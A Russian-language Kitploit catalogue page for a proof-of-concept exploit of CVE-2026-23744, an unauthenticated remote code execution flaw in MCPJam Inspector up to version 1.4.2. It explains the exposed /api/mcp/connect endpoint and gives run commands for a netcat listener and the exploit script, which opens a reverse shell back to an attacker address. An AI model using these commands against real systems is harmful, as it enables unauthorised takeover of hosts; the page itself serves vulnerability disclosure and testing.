Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-23744-POC — CVE-2026-23744 — Proof of concept эксплойт для уязвимости неаутентифицированного удалённого выполнения кода в MCPJam Inspector <= 1.4.2. | Kitploit
Инструменты/GitHubGitHub/0xsoulaimane/cve-2026-23744-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеRed TeamingИнструмент Удаленного Доступа
GitHub0xsoulaimane/cve-2026-23744-poc

CVE-2026-23744-POC

CVE-2026-23744 — Proof of concept эксплойт для уязвимости неаутентифицированного удалённого выполнения кода в MCPJam Inspector <= 1.4.2.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-23744 — Неаутентифицированное RCE в MCPJam Inspector

Python CVE Platform

MCPJam Inspector <= 1.4.2 по умолчанию привязывается к 0.0.0.0 и предоставляет доступ к /api/mcp/connect без какой-либо аутентификации. Конечная точка принимает объект serverConfig, который напрямую запускает процесс на хосте — передача полезной нагрузки с обратной оболочкой даёт немедленное RCE без необходимости в учётных данных.


Требования

root@kitploit:~
pip install requests

Использование

root@kitploit:~
python3 exploit.py -u <target_url> -i <lhost> -p <lport> [-m <method>]
ФлагОписаниеПо умолчанию
-uURL целиобязательно
-iIP вашего слушателя (LHOST)обязательно
-pПорт вашего слушателя (LPORT)обязательно
-mМетод полезной нагрузки: busybox, bash, python3busybox

Пример обратной оболочки

Шаг 1 — Запустите слушатель:

root@kitploit:~
nc -lvnp 4444

Шаг 2 — Запустите эксплойт:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Методы полезной нагрузки

Если busybox не работает на цели, попробуйте другие методы:

root@kitploit:~
# bash
python3 POC.py -u http://127.0.0.1:6274 -i 10.10.10.10 -p 4444 -m bash

Уязвимые версии

Программное обеспечениеУязвимоИсправлено
MCPJam Inspector<= 1.4.21.4.3

Ссылки

  • CrowdSec CVE Tracker — CVE-2026-23744
  • MCPJam Inspector GitHub
Скачать инструмент